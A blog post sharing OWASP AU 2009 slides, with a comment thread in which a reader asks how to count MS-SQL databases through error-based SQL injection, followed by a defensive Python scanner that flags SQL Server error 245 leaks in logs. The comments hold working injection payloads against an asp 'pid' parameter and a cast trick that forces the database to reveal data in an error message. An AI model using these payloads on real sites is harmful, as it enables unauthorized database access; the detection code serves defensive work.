Here are my slides from OWASP AU 2009.
Send comments/feedback to sid-at-notsosecure.com
Thanks for those slides 🙂
Nice slides 🙂 I have 1 question: how can I count how many databases there are via SQL injection in MS-SQL? I want to apply this query. Select count(CATALOG_NAME) from INFORMATION_SCHEMA.SCHEMATA)), or Select count(name) from master.dbo.sysdatabases
I think you are after this:
Select count(distinct name) from master.dbo.sysdatabases
or you can do select db_name(n)
and enumerate n till you get null.
Hope it helps …:)
Tnx for info but not working. I know for the db_name(n) but I need this. asp?pid=12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))--
I don't see an error. Also tried asp?pid=12 or 1=convert(int,(Select count(distinct catalog_name) from information_schema.schemata))-- no success
Don't know what to do
That's because the query returns an integer, and type conversion from int to int is valid, hence no errors.
I will look for some more type conversions to get this returned as an error message.
You can still use the blind injection boolean query to get this value, but I think I know what you are after.. 🙂
select cast('total database:'+cast(count(name) as nvarchar)as int) from master.dbo.sysdatabases
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value 'total database:6' to data type int.
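For defenders, the Msg 245 text quoted in the thread above is a usable detection signature: any HTTP response that echoes it is leaking query results through verbose database errors. The following is an added example, not part of the original post or its comments; the tab-separated log format, the request ids and the function name `find_leaks` are assumptions made for illustration.

```python
import re

# SQL Server error 245 wording, as quoted in the thread. The quoted value is
# whatever the failed conversion was applied to, i.e. the data being leaked.
# Straight and typographic quotes are both accepted, since pages often
# re-encode them.
CONVERSION_ERROR = re.compile(
    r"Conversion failed when converting the (?P<src>n?varchar) value "
    r"['\u2018](?P<value>.*?)['\u2019] to data type (?P<dst>\w+)",
    re.DOTALL,
)


def find_leaks(log_lines):
    """Return (line_number, request_id, leaked_value) for every logged
    response body that echoes a SQL Server conversion error to the client."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        # Assumed log format: "<request id>\t<response body>"
        request_id, _, body = line.partition("\t")
        match = CONVERSION_ERROR.search(body)
        if match:
            findings.append((number, request_id, match.group("value")))
    return findings


# Constructed sample log: one normal page, one response carrying the error
# text from the thread, and one response with a generic error page (the
# behaviour you want once verbose errors are disabled).
SAMPLE_LOG = [
    "req-001\t<html>Widget 12</html>",
    "req-002\tMsg 245, Level 16, State 1, Line 1 Conversion failed when "
    "converting the nvarchar value 'total database:6' to data type int.",
    "req-003\t<html>Sorry, something went wrong.</html>",
]

if __name__ == "__main__":
    for number, request_id, value in find_leaks(SAMPLE_LOG):
        print(f"line {number}: {request_id} leaked {value!r} in an error page")
```

A hit means two things need fixing: the query is built from unparameterized input, and the application returns raw database errors to the client instead of a generic error page.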